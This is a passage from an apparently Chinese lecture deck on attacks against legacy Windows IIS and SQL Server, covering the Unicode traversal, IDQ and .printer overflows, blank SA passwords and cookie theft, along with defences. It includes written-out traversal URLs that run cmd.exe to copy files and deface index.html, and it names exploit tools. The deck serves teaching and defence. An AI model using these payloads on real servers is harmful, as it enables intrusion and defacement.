scripts/..%c1%1c../winnt/system32/cmd.exe?/c+copy+c:\winnt\system32\cmd.exec:\inetpub\scripts\win.exe(6)echo命令修改文件内容，例如修改主机c:\inetpub\wwwroot\index.html网页内容，可在浏览器的地址栏中输入如下内容：02/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+echo+内容+>c:\inetpub\wwwroot\index.html第81页，讲稿共101页，2023年5月2日，星期三823.防御办法在若系统存在Unicode漏洞，可采取如下方法进行补救:(1)限制网络用户访问和调用CMD命令的权限；(2)若没必要使用SCRIPTS和MSADC目录，将其全部删除或改名；(3)安装WindowsNT系统时不要使用默认winnt路径，您可以改为其他的文件夹，如C:\mywindowsnt；(4)用户可从Microsoft网站安装补丁。第82页，讲稿共101页，2023年5月2日，星期三834.5.2IDA＆IDQ缓冲区溢出漏洞攻击与防御1.漏洞危害及成因作为安装IIS过程的一部分，系统还会安装几个ISAPI扩展.dlls，其中idq.dll是IndexServer的一个组件，对管理员脚本和Internet数据查询提供支持。但是，idq.dll在一段处理URL输入的代码中存在一个未经检查的缓冲区，攻击者利用此漏洞能导致受影响服务器产生缓冲区溢出，从而执行自己提供的代码。更为严重的是，idq.dll是以System身份运行的，攻击者可以利用此漏洞取得系统管理员权限。第83页，讲稿共101页，2023年5月2日，星期三842.攻击实现如同所有的漏洞入侵过程一样，先使用各种通用的漏洞扫描工具扫描出漏洞机器。然后到网络上搜索针对该漏洞的利用工具，如溢出工具图形界面的SnakeIISIDQ和命令行下的IISidq或者Idqover等。[实例]利用SnakeIISIDQ工具进行IDQ缓冲区溢出漏洞攻击第84页，讲稿共101页，2023年5月2日，星期三85对于IDA＆IDQ漏洞的防御方法主要是下载相应补丁即可。第85页，讲稿共101页，2023年5月2日，星期三864.5.3Pinter溢出漏洞入侵与防御1.漏洞成因及危害Windows2000IIS5的打印ISAPI扩展接口建立了.printer扩展名到msw3prt.dll的映射关系，缺省情况下该映射存在。当远程用户提交对.printer的URL请求时，IIS5调用msw3prt.dll解释该请求。由于msw3prt.dll缺乏足够的缓冲区边界检查，远程用户可以提交一个精心构造的针对.printer的URL请求，其“Host:”域包含大约420字节的数据，此时在msw3prt.dll中发生典型的缓冲区溢出，潜在允许执行任意代码。溢出发生后，Web服务停止响应，Win2K可以检查到Web服务停止响应，从而自动重启它，因此，系统管理员很难意识到发生过攻击。第86页，讲稿共101页，2023年5月2日，星期三872.攻击实现由于.printer漏洞只有IIS5.0（Windows2000Server）存在，所以入侵者通过此漏洞入侵计算机只会针对IIS5.0进行。[实例]利用.printer漏洞建立管理员组用户第87页，讲稿共101页，2023年5月2日，星期三883.防御办法(1)对于.printer溢出漏洞打相应补丁。(2)手工删除.printer，因为这个文件存在溢出漏洞。溢出漏洞是由于.printer后缀的脚本会输送给msw3prt.dll，我们可以删除.printer映射。在计算机的“控制面板”选择“管理工具”下的“Internet服务管理器”，打开Web站点属性对话框中的“主目录”选项卡，单击配置，找到.printer映射，如图4-49所示，然后删除即可。第88页，讲稿共101页，2023年5月2日，星期三894.6Web应用漏洞攻击技术与防御技术1.MicrosoftSQLServer空口令漏洞描述MicrosoftSQLServer是微软的关系数据库产品。所谓空口令漏洞，实际上并不是一个漏洞，而是管理员配置上的疏忽。在微软的MSSQL-SERVER7.0以下的版本在默认安装时，其SA（SystemAdministrator）账户口令为空，所开端口为1433，一个入侵者只需要使用一个MSSQL客户端与SA口令为空的服务器连接就可以获得System的权限。第89页，讲稿共101页，2023年5月2日，星期三902.MicrosoftSQLServer空口令攻击实现攻击者可以使用MSSQL客户端或是第三方客户端连接工具将空口令服务器的数据库导出、增加管理员等操作，GUI的SqlExec.exe就是其中一款。[实例]利用MicrosoftSQLServer空口漏洞建立后门账号第90页，讲稿共101页，2023年5月2日，星期三913.漏洞防御(1)确保你的SA登录账号的密码非空。只有你的SA登录账号没有安全保障的时候蠕虫才会工作。因此，你应该遵循在SQLServer联机文档中“系统管理员（SA）登录”主题中的推荐模式，确保固有的SA账号具有一个强壮的密码，即使是你自己从不使用SA账号。(2)在你的互联网网关或防火墙上屏蔽1433端口和/或指定SQLServer监听一个可选的端口。(3)假如在你的互联网网关上需要利用1433端口，启动用于防止此端口滥用的流入/流出过滤。(4)将SQLServer和SQLServer客户端运行在微软的WindowsNT账号下，而不是localsystem。(5)启动WindowsNT验证，启动监听成功和失败的登录，然后停止并重启MSSQLServer服务。设置你的客户端使用NT验证。第91页，讲稿共101页，2023年5月2日，星期三924.6.2Cookie攻击1.Cookie简介Cookie或称Cookies，指某些网站为了辨别用户身份而储存在用户本地终端上的数据（通常经过加密）。用户在登陆时，系统就保留了该用户的Cookie信息。当我们单击进入会员专区的时候，事实客户端向服务器提交了本地Cookie信息，包括用户名、密码等。有些网站存放用户名和密码的Cookie是明文的，黑客只要读取Cookie文件就可以得到账户和密码，有些Cookie是通过Md5加密的，用户仍然可以通过破解得到关键信息。第92页，讲稿共101页，2023年5月2日，星期三932.Cook